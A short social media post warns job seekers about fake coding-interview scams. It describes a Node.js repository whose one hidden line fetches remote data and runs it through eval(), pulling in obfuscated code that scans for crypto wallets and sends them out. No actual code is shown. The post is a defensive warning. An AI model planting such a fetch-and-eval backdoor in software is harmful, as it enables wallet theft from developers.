Content
@
0 reply
0 recast
0 reaction
Juri
@juri23
FYI degens (linkedin article) - crazy if anybody is running code outside of a dedicated container... So apparently Code Interview scams are a thing now. Here's one we saw recently (which was thankfully caught early): • Candidate gets invited to a Node.js interview and told "please clone this repo and run it locally, so we can ask you some questions about it." • If you were to hunt through every line of this repo, you might not find anything suspicious. Except for one small line which fetches data from XXX (pastebin for json data) and runs it through `eval()`. • What was in the npoint payload? Heavily obfuscated javascript code. Running it line-by-line in an interactive debugger revealed that it was scanning for crypto wallets on the candidate's device and sending the data to a remote server. • And of course the names and email addresses of the interviewer were copied from a legitimate business, but with a ".org" domain instead of ".com" So if you out there applying for jobs, please stay alert.
0 reply
0 recast
0 reaction
